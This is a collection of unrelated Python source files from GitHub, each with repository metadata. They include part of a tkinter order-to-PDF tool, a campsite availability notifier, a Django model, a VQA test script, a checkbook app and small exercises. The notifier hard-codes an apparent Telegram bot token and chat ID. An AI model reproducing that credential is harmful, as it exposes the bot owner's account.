namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(txt_font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), txt)\n namePDF.pdf.restoreState()\n #Showing option for text or Number\n label_NumOrTxt = tk.Label(text='Number or Txt: ')\n label_NumOrTxt.place(relx=.3, rely=.45)\n entry_NumOrTxt = tk.Entry(width=15)\n entry_NumOrTxt.place(relx=.55, rely=.45)\n button_NumOrTxt = tk.Button(text='Submit',\n command=lambda: numOrTxt(entry_NumOrTxt.get()))\n button_NumOrTxt.place(relx=.4, rely=.5)\n print(f'''\n {name}\n Number: {number}\n Number Font: {number_font}\n Number Color: {number_clr}\n Text: {txt}\n Text Font: {txt_font}\n Text Color: {txt_clr}\n Size: {size}\n ''')\n break\n #Custom Headband\n elif product_id == 1376623132727:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n print(f'''\n {name}\n {txt}\n {font}\n {txt_color}\n 
{size}\n ''')\n namePDF.pdf.saveState()\n headbandFontSize(txt, font)\n namePDF.pdf.drawString(20, 1150 - (150*int(namePDF.numberEntries)), txt)\n namePDF.pdf.restoreState()\n break\n #H2O Dry Tek\n elif product_id == 4449171472439:\n print('Item is H20 Drytek')\n break\n #Number Football Towel\n elif product_id == 1688836046903:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n number = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n print(f'''\n {name}\n {number}\n {font}\n {txt_color}\n ''')\n namePDF.pdf.saveState()\n numberFontSize(number, font)\n namePDF.pdf.drawString(20, 1150 - (110*int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n break\n #Custom Leg Sleeve\n elif product_id == 673478279223:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n text = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n txt_length = len(text)\n print(f'''\n {name}\n {text}\n {font}\n {txt_color}\n {size}\n {txt_length}\n ''')\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), text)\n namePDF.pdf.restoreState()\n break\n #Trust God\n elif product_id == 4449409925175:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(f'''\n {name}\n ''')\n namePDF.pdf.drawImage('trust god.png', 10, 1125 - (110 * int(namePDF.numberEntries)), width=600, preserveAspectRatio=True, mask='auto')\n break\n #Why So Serious\n elif product_id == 1460221837367:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('why-so-serious.png', 10, 1075 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=225)\n break\n #For momma\n elif product_id == 4449405599799:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('for-momma.png', 10, 1150 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=120)\n break\n #Goat\n elif product_id == 1460206665783:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('goat.png', 10, 1150 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=120)\n break\n #Sauce\n elif product_id == 1460211646519:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('saucepng.png', 10, 1090 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=180)\n break\n #Custom Forearm\n elif product_id == 1386165796919:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n 
right_txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n left_txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n font_clr = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n print(f'''\n {name}\n Right txt: {right_txt}\n Left txt: {left_txt}\n Font: {font}\n Font Clr: {font_clr}''')\n #Right Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.7, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), right_txt)\n namePDF.pdf.restoreState()\n namePDF.numberEntries = namePDF.numberEntries + 1\n #Left Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.7, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), left_txt)\n namePDF.pdf.restoreState()\n break\n else:\n print('Item not valid')\n break\n else:\n x = x + 1\n namePDF.numberEntries = namePDF.numberEntries + 1\n\n\ndef savePDF():\n namePDF.pdf.save()\n\n\ndef get_specificItem(number):\n get_specificItem.number = number\n get_specificItem.number = int(get_specificItem.number)\n\n#Get Date for API-------------------------------------------------------\nlabel_date = tk.Label(text='Date: ')\nlabel_date.place(relx=.05, rely=.08)\n\nentry_date = tk.Entry(width=15)\nentry_date.place(relx=.09, rely=.076)\n\nbutton_date = tk.Button(text='Get Order Info', command=lambda: get_date())\nbutton_date.place(relx=.20, rely=.076)\n\n#Name PDF----------------------------------------------------------------\nlabel_pdf = tk.Label(text='PDF NAME: ')\nlabel_pdf.place(relx=.032, rely=.12)\n\nentry_pdf = tk.Entry(width=15)\nentry_pdf.place(relx=.09, rely=.117)\n\nbutton_pdf = tk.Button(text='Name PDF', command=lambda: namePDF(entry_pdf.get()))\nbutton_pdf.place(relx=.20, rely=.117)\n\n#Select Order Number----------------------------------------------------\nlabel_order = tk.Label(text='Order Number: ')\nlabel_order.place(relx=.020, rely=.16)\n\nentry_order = tk.Entry(width=15)\nentry_order.place(relx=.09, rely=.158)\n\nbutton_order = tk.Button(text='Get Order Info', command=lambda: find_order(entry_order.get()))\nbutton_order.place(relx=.20, rely=.158)\n\n#Save PDF---------------------------------------------------------------\nbutton_savePDF = tk.Button(text='Save PDF', command=lambda: savePDF())\nbutton_savePDF.place(relx=.40, rely=.6)\n\n#Get Specific Item------------------------------------------------------\nlabel_specificItem = tk.Label(text='Line Number:')\nlabel_specificItem.place(relx=.02, rely=.2)\n\nentry_specificItem = tk.Entry(width=15)\nentry_specificItem.place(relx=.09, rely=.199)\n\nbutton_specificItem = tk.Button(text='Get Line Item', command=lambda: get_specificItem(entry_specificItem.get()))\nbutton_specificItem.place(relx=.2, rely=.199)\n\n#lists for sorting-------------------------------------------------------\nwhite_list = []\nblack_list = []\nnavy_list = []\npink_list = []\nshark_teal_list = []\ncarolina_blue_list = []\nroyal_blue_list = []\nathletic_yellow_list = []\nbright_yellow_list = []\nkelly_green_list = []\nforest_green_list = []\nhi_vis_green_list = []\nvegas_gold_list = []\nshiny_gold_list = []\nshiny_silver_list = []\nbrown_list = []\nmidnight_navy_list = []\npurple_list = []\nmaroon_list = []\nred_list = []\nsport_orange_list = []\nno_customization_list = 
[]\n\n#functions for sorting orders-------------------------------------------------------------------------------------------\n\ndef add_to_list(txt_color, specific_order, line_number):\n if txt_color == 'White':\n white_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Black':\n black_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Navy':\n navy_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Pink':\n pink_list.append(f'{specific_order}, {line_number}')\n elif txt_color == \"Carolina Blue\":\n carolina_blue_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Royal Blue':\n royal_blue_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Shark Teal':\n shark_teal_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Midnight Navy':\n midnight_navy_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Sport Orange':\n sport_orange_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Purple':\n purple_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Brown':\n brown_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Maroon':\n maroon_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Red':\n red_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Shiny Silver':\n shiny_silver_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Shiny Gold':\n shiny_gold_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Vegas Gold':\n vegas_gold_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'High-Vis Green':\n hi_vis_green_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Forest Green':\n forest_green_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Kelly Green':\n kelly_green_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Bright Yellow':\n bright_yellow_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Athletic Yellow':\n athletic_yellow_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 0:\n no_customization_list.append(f'{specific_order}, {line_number}')\n\n\ndef find_range(start, end):\n return list(range(start, end + 1, 1))\n\n\ndef text_1(number_of_items, x2, specific_order):\n x1 = 0\n while x1 < number_of_items:\n product_id = int(get_date.orders['orders'][x2]['line_items'][x1][\"product_id\"])\n # Custom Number Product-----------------------------------------------------------------------------------------\n if product_id == 626889097271:\n txt_color = (get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n print(txt_color)\n add_to_list(txt_color, specific_order, x1)\n # Customized Arm Sleeve-----------------------------------------------------------------------------------------\n elif product_id == 10834995656:\n txt_color = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n print(txt_color)\n add_to_list(txt_color, specific_order, x1)\n # Custom Text Number Sleeve-------------------------------------------------------------------------------------\n elif product_id == 1421879279671:\n number_clr = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n add_to_list(number_clr, specific_order, x1)\n txt_clr = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][5]['value'])\n add_to_list(txt_clr, specific_order, x1)\n # Custom 
Headband-----------------------------------------------------------------------------------------------\n elif product_id == 1376623132727:\n txt_color = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n add_to_list(txt_color, specific_order, x1)\n # Custom Leg Sleeve---------------------------------------------------------------------------------------------\n elif product_id == 673478279223:\n txt_color = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n add_to_list(txt_color, specific_order, x1)\n # Custom Forearm------------------------------------------------------------------------------------------------\n elif product_id == 1386165796919:\n font_clr = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][3]['value'])\n add_to_list(font_clr, specific_order, x1)\n #Custom Football Towel------------------------------------------------------------------------------------------\n elif product_id == 1688836046903:\n txt_color = (get_date.orders['orders'][x2]['line_items'][get_specificItem.number]['properties'][2]['value'])\n add_to_list(txt_color, specific_order, x1)\n else:\n add_to_list(0, specific_order, x1)\n x1 = x1 + 1\n\n\ndef filter_order_text_color(specific_order):\n x2 = 0\n while specific_order != \"QUIT\":\n if specific_order == int(get_date.orders['orders'][x2]['order_number']):\n print(specific_order)\n number_of_items = int(len(get_date.orders['orders'][x2]['line_items']))\n print(number_of_items)\n text_1(number_of_items, x2, specific_order)\n break\n else:\n x2 = x2 + 1\n\n\ndef print_lists():\n print(\"White: \" + str(white_list))\n print('Black: ' + str(black_list))\n print('Navy: ' + str(navy_list))\n print('Pink: ' + str(pink_list))\n print('Shark Teal: ' + str(shark_teal_list))\n print('Carolina Blue: ' + str(carolina_blue_list))\n print('Royal Blue: ' + str(royal_blue_list))\n print('Athletic Yellow: ' + str(athletic_yellow_list))\n print('Bright Yellow: ' + str(bright_yellow_list))\n print('Kelly Green: ' + str(kelly_green_list))\n print('Forest Green: ' + str(forest_green_list))\n print('HI VIS Green: ' + str(hi_vis_green_list))\n print('Vegas Gold: ' + str(vegas_gold_list))\n print('Shiny Gold: ' + str(shiny_gold_list))\n print('Shiny Silver: ' + str(shiny_silver_list))\n print('Brown: ' + str(brown_list))\n print('Midnight Navy: ' + str(midnight_navy_list))\n print('Purple: ' + str(purple_list))\n print('Maroon: ' + str(maroon_list))\n print('Red: ' + str(red_list))\n print('Sport Orange: ' + str(sport_orange_list))\n print('No Customization: ' + str(no_customization_list))\n white_label = tk.Label(text=f'{white_list}')\n white_label.place(relx=.5, rely=.4)\n\n\ndef sort_orders(beg_num, end_num):\n list1 = find_range(beg_num, end_num)\n print(list1)\n range = len(find_range(beg_num, end_num))\n y1 = 0\n while y1 < range:\n filter_order_text_color(list1[y1])\n y1 = y1 + 1\n print_lists()\n print(white_list[0][0])\n\n\n\n\n#Beginning Number tkinter-----------------------------------------------------\nlabel_beginning_number = tk.Label(text=\"Beginning Order Number: \")\nlabel_beginning_number.place(relx=.5, rely=.2)\n\nentry_beginning_number = tk.Entry(width=15)\nentry_beginning_number.place(relx=.62, rely=.195)\n\n#Ending Number tkinter---------------------------------------------------------\nlabel_ending_number = tk.Label(text=\"Ending Order Number: \")\nlabel_ending_number.place(relx=.5, rely=.25)\n\nentry_ending_number = tk.Entry(width=15)\nentry_ending_number.place(relx=.62, 
rely=.25)\n\n#Button for making sorting------------------------------------------------------\nbutton_sort_orders = tk.Button(text=\"Sort Orders\", command=lambda: sort_orders(int(entry_beginning_number.get()), int(entry_ending_number.get())))\nbutton_sort_orders.place(relx=.62, rely=.3)\n\nroot.mainloop()","repo_name":"TaanHabchy/ChrisCode","sub_path":"markJV.py","file_name":"markJV.py","file_ext":"py","file_size_in_byte":28770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"238932563","text":"import requests\nfrom bs4 import BeautifulSoup\nimport telegram\nimport schedule\nimport time\nimport json\nimport asyncio\n\n# Telegram\nasync def bot_send(msg):\n telegram_token = \"5128692345:AAHkO-3JZ9tZYP2hrS5UAlnYCrO0PiO09_A\"\n telegram_id = \"444879086\"\n bot = telegram.Bot(token = telegram_token)\n await bot.sendMessage(chat_id=telegram_id, text=msg)\n\nurl_array = [\n 'https://imjingakcamping.co.kr/module/reserv21/res_01_calendar.php?year=2023&month=03&day=25'\n ]\ndata_array = [\n '임진각평화누리캠핑장 https://imjingakcamping.co.kr/resv/res_01.html?checkdate=2023-03-25'\n ]\n\njsonData = None\ncnt = 0\n\nprint(\"[\" + \"임직각 평화누리 예약\" + \"] \")\n\ndef message1():\n for index, value in enumerate(url_array):\n # BeautifulSoup\n response = requests.get(value)\n # time.sleep(3)\n cnt = 0\n message = \"[\" + data_array[index] + \"]\" + '\\n'\n if response.status_code == 200:\n jsonData = response.json()\n # print(jsonData.get(\"result\"))\n # print(jsonData.get(\"result\").get(\"cv_a_01\"))\n\n # matching = [s for s in jsonData.get(\"result\").keys() if \"ph\" in s]\n # matching.extend([s for s in jsonData.get(\"result\").keys() if \"hl\" in s])\n # print(matching)\n # data = jsonData.get(\"result\").items()\n # print(data)\n print(\"index : \", index, \"None : \", jsonData.get(\"result\").items() is None)\n if jsonData.get(\"result\").items() is not None:\n for key, value in jsonData.get(\"result\").items():\n if value == \"0\":\n # 평화캠핑존\n if key.startswith(\"ph\"):\n # print(\"평화캠핑존\", \" : \", key, \" : \", value)\n message = message + \"평화캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n # 힐링캠핑존\n if key.startswith(\"hl\"):\n # print(\"힐링캠핑존\", \" : \", key, \" : \", value)\n message = message + \"힐링캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n # 누리캠핑존\n if key.startswith(\"nr\"):\n # print(\"누리캠핑존\", \" : \", key, \" : \", value)\n message = message + \"누리캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n # 에코캠핑존\n if key.startswith(\"ec\"):\n # print(\"에코캠핑존\", \" : \", key, \" : \", value)\n message = message + \"에코캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n if cnt > 0:\n asyncio.run(bot_send(message)) \n else :\n print(response.status_code)\n\n# step3.실행 주기 설정\nschedule.every(30).seconds.do(message1)\n# schedule.every(1).minutes.do(message1)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"goodjjt/imjingak_crawling","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74401880486","text":"from django.db import models\nfrom django.utils.html import format_html\nfrom users.models import User\n\n\nclass Client(models.Model):\n first_name = models.CharField(max_length=25)\n last_name = models.CharField(max_length=25)\n email = models.EmailField(max_length=100, unique=True)\n phone = models.CharField(max_length=20, unique=True)\n 
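The reservation crawler above ends with the usual schedule polling loop: register a job on an interval, then alternate run_pending() with a short sleep. A generic sketch of that loop follows, with a dummy job standing in for the real HTTP check and the loop bounded so the sketch terminates; the 30-second interval matches the crawler's.

import time
import schedule

def check_availability():
    # the real job would issue requests.get() and inspect the JSON here
    print("polling reservation calendar...")

schedule.every(30).seconds.do(check_availability)

for _ in range(120):         # bounded here so the sketch terminates (~2 min)
    schedule.run_pending()   # runs any registered job whose interval has elapsed
    time.sleep(1)            # avoid a busy-wait between checks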
mobile = models.CharField(max_length=20, blank=True)\n    company_name = models.CharField(max_length=250)\n    date_created = models.DateTimeField(auto_now_add=True)\n    date_updated = models.DateTimeField(auto_now=True)\n    sales_contact = models.ForeignKey(\n        User, on_delete=models.SET_NULL, null=True, related_name=\"saler_id\"\n    )\n    existing = models.BooleanField(default=False)\n\n    def __str__(self) -> str:\n        return f\"{self.first_name} {self.last_name}\"\n\n    def existing_status(self):\n        existing_status = self.existing\n        if existing_status:\n            color = \"green\"\n        else:\n            color = \"red\"\n        return format_html('<span style=\"color: {};\">{}</span>', color, existing_status)\n\n    class Meta:\n        verbose_name = \"Client\"\n        verbose_name_plural = \"Clients\"\n","repo_name":"BernicheAurelie/P12","sub_path":"clients/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5658080028","text":"from Modules.helper.imports.functionImports import checkFile, createDataLoader, testModel\nfrom Modules.helper.imports.packageImports import load_dataset, pd, np, torch, cv2, torchvision, transformers, logging, argparse, pickle\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n    \"-debug\",\n    action=\"store_true\",\n    help=\"Boolean flag to enable debug mode\"\n)\n\nparser.add_argument(\n    \"-log\",\n    type=str,\n    help=\"Path to file to print logging information\",\n    default=None\n)\n\nparser.add_argument(\n    \"-cacheDir\",\n    help=\"Path to cache location for Huggingface datasets\",\n    default=\"/scratch/general/vast/u1419542/huggingface_cache/datasets/\"\n)\n\nparser.add_argument(\n    \"-valTestSplit\",\n    type=float,\n    help=\"Percentage split between validation and test sets as a fraction\",\n    default=0.9\n)\n\nparser.add_argument(\n    \"-batchSize\",\n    type=int,\n    help=\"Batch size of dataloader\",\n    default=64\n)\n\nparser.add_argument(\n    \"-maxSamples\",\n    type=int,\n    help=\"Maximum no. 
parser.add_argument(\n    \"-maxSamples\",\n    type=int,\n    help=\"Maximum no. of samples to be used in train/validation/test sets (Memory constraints)\",\n    default=45000\n)\n\nparser.add_argument(\n    \"-maxLen\",\n    type=int,\n    help=\"Maximum length of question sequence input to BERT model\",\n    default=128\n)\n\nparser.add_argument(\n    \"-preTrainedModel\",\n    type=str,\n    help=\"Pretrained BERT model to use from transformers package\",\n    default=\"bert-base-cased\"\n)\n\nparser.add_argument(\n    \"-imageSize\",\n    type=int,\n    help=\"Target Size of image [(3, imageSize, imageSize)]\",\n    default=224\n)\n\nparser.add_argument(\n    \"-vocab\",\n    help=\"Path to file containing Decoder vocabulary\",\n    default=\"vocab.pkl\"\n)\n\nparser.add_argument(\n    \"-load\",\n    help=\"Path to file containing model to load\",\n    default=\"fullModel.pt\"\n)\n\nargs = parser.parse_args()\n\ndebug = args.debug\nlogFile = args.log\ncacheDir = args.cacheDir\nvalTestSplit = args.valTestSplit \nbatchSize = args.batchSize\nmaxSamples = args.maxSamples\nmaxLen = args.maxLen\npreTrainedModel = args.preTrainedModel \nimageSize = args.imageSize\nvocabPath = args.vocab\nloadModel = args.load\n\ncheckFile(vocabPath, \".pkl\")\nwith open(vocabPath, \"rb\") as f:\n    vocab = pickle.load(f)\n\nif logFile:\n    checkFile(logFile)\n    logging.basicConfig(filename=logFile, filemode='w', level=logging.INFO)\nelif debug:\n    logging.basicConfig(filemode='w', level=logging.DEBUG)\nelse:\n    logging.basicConfig(filemode='w', level=logging.INFO)\n\nif valTestSplit <= 0 or valTestSplit >= 1:\n    raise ValueError(\"valTestSplit should be a floating point value between 0 and 1!\")\nif batchSize <= 0:\n    raise ValueError(\"Batch Size has to be a positive number!\")\n\n\nimgToTensor = torchvision.transforms.Compose([\n    torchvision.transforms.ToTensor(),\n    torchvision.transforms.Resize(size=(imageSize, imageSize))\n])\n\nds = load_dataset(\"Graphcore/vqa\", cache_dir=cacheDir)\n\noriValid = ds[\"validation\"]\nvalid, test = [], []\n\nfor v in oriValid:\n    if len(v[\"label\"][\"weights\"]):\n        image = cv2.imread(v[\"image_id\"])\n        v[\"image\"] = imgToTensor(image)\n        valid.append(v)\n    if max(valTestSplit, 1-valTestSplit)*len(valid) >= maxSamples:\n        break\n\ntest = valid[int(len(valid)*valTestSplit):]\ntestDF = pd.DataFrame(test)\n\nif torch.cuda.is_available():\n    device = torch.device(\"cuda\")\nelse:\n    device = torch.device(\"cpu\")\n\ncheckFile(loadModel, \".pt\")\nmodel = torch.load(loadModel)\nmodel = model.to(device)\n\ntokenizer = transformers.BertTokenizer.from_pretrained(preTrainedModel)\n\n#Perform Data Augmentations\n#Not suitable for this dataset\ntestDataLoader = createDataLoader(testDF, vocab, tokenizer, maxLen, batchSize, device)\n\nlogging.info(\"Data Statistics:\")\nlogging.info(f\"\\tTest: {len(testDF)} examples\")\nlogging.info(\"*\"*15)\n\nallImages, allQuestions, allLabels, allTargets, testAcc = testModel(\n    model, \n    testDataLoader, \n    device, \n    len(testDF), \n    vocab\n)\n\nlogging.info(f\"\\tTest Accuracy: {testAcc}\")\n\npredictions = {\n    \"images\": allImages,\n    \"questions\": allQuestions,\n    \"labels\": allLabels,\n    \"targets\": allTargets\n}\n\nwith open(\"testPredictions.pkl\",\"wb\") as f:\n    pickle.dump(predictions, f)","repo_name":"RishanthRajendhran/visualQA","sub_path":"Modules/testModel.py","file_name":"testModel.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7588098540","text":"import program_functions as pf\nfrom datetime import datetime as dt\n\n# Checkbook file will start to run here\n# 
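a simple menu loop: view balance, withdraw, deposit, or exit\n# 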
-----------------------------------------------------------------\nif __name__ == \"__main__\":\n    print(\"\\n~~~ Welcome to your terminal checkbook! ~~~\\n\")\n\n    while True:\n\n        # Make initial check of user input\n        user_input = pf.user_interface()\n\n        # csv file to be used for the user balance\n        balance_file_name = \"bonus_user_balance_file.csv\"\n\n        ## Conduct user operations\n        if user_input == 1:\n            transaction_type_toAdd = \"View\"\n            primary_key, curr_balance, trans_type,transaction_date = pf.view_curr_balance(balance_file_name)\n\n            print(f\"Current user balance: ${curr_balance}\")\n            print(f\"Transaction made on {dt.date(transaction_date)} at {dt.time(transaction_date)}\")\n\n            # Because viewing the balance is another transaction, add it to the balance sheet\n            pf.user_deposit_withdraw(balance_file_name, curr_balance, primary_key, transaction_type_toAdd)\n\n            # check for continuation of interface\n            responce = pf.continue_transaction_propt()\n            if responce:\n                print(\"Would you like to explore more options? (yes or no)\")\n                continue\n            else:\n                pf.user_exit()\n                break\n        \n        elif user_input == 2:\n            transaction_type_toAdd = \"Withdraw\"\n\n            # Get withdraw amount from user and current balance from file\n            primary_key, prev_balance, trans_type,transaction_date = pf.view_curr_balance(balance_file_name)\n            user_amount, withdraw_amount = pf.withdraw_validattion(prev_balance)\n\n            # Apply the withdrawal to the existing balance\n            pf.user_deposit_withdraw(balance_file_name, withdraw_amount, primary_key, transaction_type_toAdd)\n            print(f\"\\n${float(user_amount)} has been withdrawn from ${prev_balance}\")\n            \n            # Retrieving new balance\n            primary_key, new_curr_balance, trans_type, transaction_date = pf.view_curr_balance(balance_file_name)\n            print(f\"New account balance: ${new_curr_balance}\")\n            print(f\"Transaction made on {dt.date(transaction_date)} at {dt.time(transaction_date)}\")\n\n            # check for continuation of interface\n            responce = pf.continue_transaction_propt()\n            if responce:\n                continue\n            else:\n                pf.user_exit()\n                break\n\n        elif user_input == 3:\n            transaction_type_toAdd = \"Deposit\"\n\n            # Get deposit amount from user and current balance from file\n            user_input = pf.validate_user_input_amount(\"deposit\")\n            primary_key, prev_balance, trans_type, transaction_date = pf.view_curr_balance(balance_file_name)\n\n            # Adding user input to existing balance\n            deposit_amount = user_input + prev_balance\n            pf.user_deposit_withdraw(balance_file_name, deposit_amount, primary_key, transaction_type_toAdd)\n            print(f\"\\n${float(user_input)} has been added to ${prev_balance}\")\n            \n            # Retrieving new balance\n            primary_key, new_curr_balance, trans_type, transaction_date = pf.view_curr_balance(balance_file_name)\n            print(f\"New account balance: ${new_curr_balance}\")\n            print(f\"Transaction made on {dt.date(transaction_date)} at {dt.time(transaction_date)}\")\n\n            # check for continuation of interface\n            responce = pf.continue_transaction_propt()\n            if responce:\n                continue\n            else:\n                pf.user_exit()\n                break\n\n        elif user_input == 4:\n            pf.user_exit()\n            break\n    \n\n    ","repo_name":"MigashaneVictoire/checkbook_application","sub_path":"bonus_checkbook.py","file_name":"bonus_checkbook.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26891831753","text":"class Product:\n    def __init__(self, name, price):\n        self.name = name\n        self.price = price\n\n\nclass BonusCard:\n    def __init__(self):\n        self.products = []\n\n    def add_product(self, product):\n        
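# record the purchase; calculate_bonus later sums a 5% bonus over every price of at least 10 euros\n        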
self.products.append(product)\n\n    def calculate_bonus(self):\n        # print(self.products)\n        bonus = sum([product.price * 0.05 for product in self.products if product.price >= 10])\n        return round(bonus, 2)\n\n\nclass GoldCard(BonusCard):\n    def calculate_bonus(self):\n        bonus = super().calculate_bonus()\n        return round(bonus * 1.5, 2)\n\n\ndef main():\n    card_type = input(\"Do you want a bonus card or a gold card (B/G)? \")\n    if card_type.upper() == \"B\":\n        card = BonusCard()\n    else:\n        card = GoldCard()\n\n    while True:\n        action = input(\"What do you want to do: add product, calculate bonus, exit (A/C/E)? \")\n        if action.upper() == \"A\":\n            product_name = input(\"Enter the product name: \")\n            product_price = float(input(\"Enter the price of the product: \"))\n            product = Product(product_name, product_price)\n            card.add_product(product)\n        elif action.upper() == \"C\":\n            print(f\"Your bonus is {card.calculate_bonus()} euros.\")\n        elif action.upper() == \"E\":\n            break\n        else:\n            print(\"Invalid action, please try again.\")\n\n\nmain()\n","repo_name":"Nurech/Python_LTAT.03.001","sub_path":"homeworks/05.12/class3.py","file_name":"class3.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22282602874","text":"# Say you have an array prices for which the ith element is the price of a given stock on day i.\n#\n# Design an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times).\n\nclass Solution(object):\n    def maxProfit(self, prices):\n        if not prices or len(prices) == 1:\n            return 0\n        profit = 0\n        for i in range(1, len(prices)):\n            if prices[i] > prices[i-1]:\n                profit += prices[i] - prices[i-1]\n        return profit\n\n\nif __name__ == '__main__':\n    print(Solution().maxProfit([7, 1, 5, 3, 6, 4])) # 7\n    print(Solution().maxProfit([1, 2, 3, 4, 5])) # 4\n    print(Solution().maxProfit([7, 6, 4, 3, 1])) # 0","repo_name":"WestLakeBao/Luyaos-LeetCode-sols-in-Python","sub_path":"122. Best Time to Buy and Sell Stock II.py","file_name":"122. 
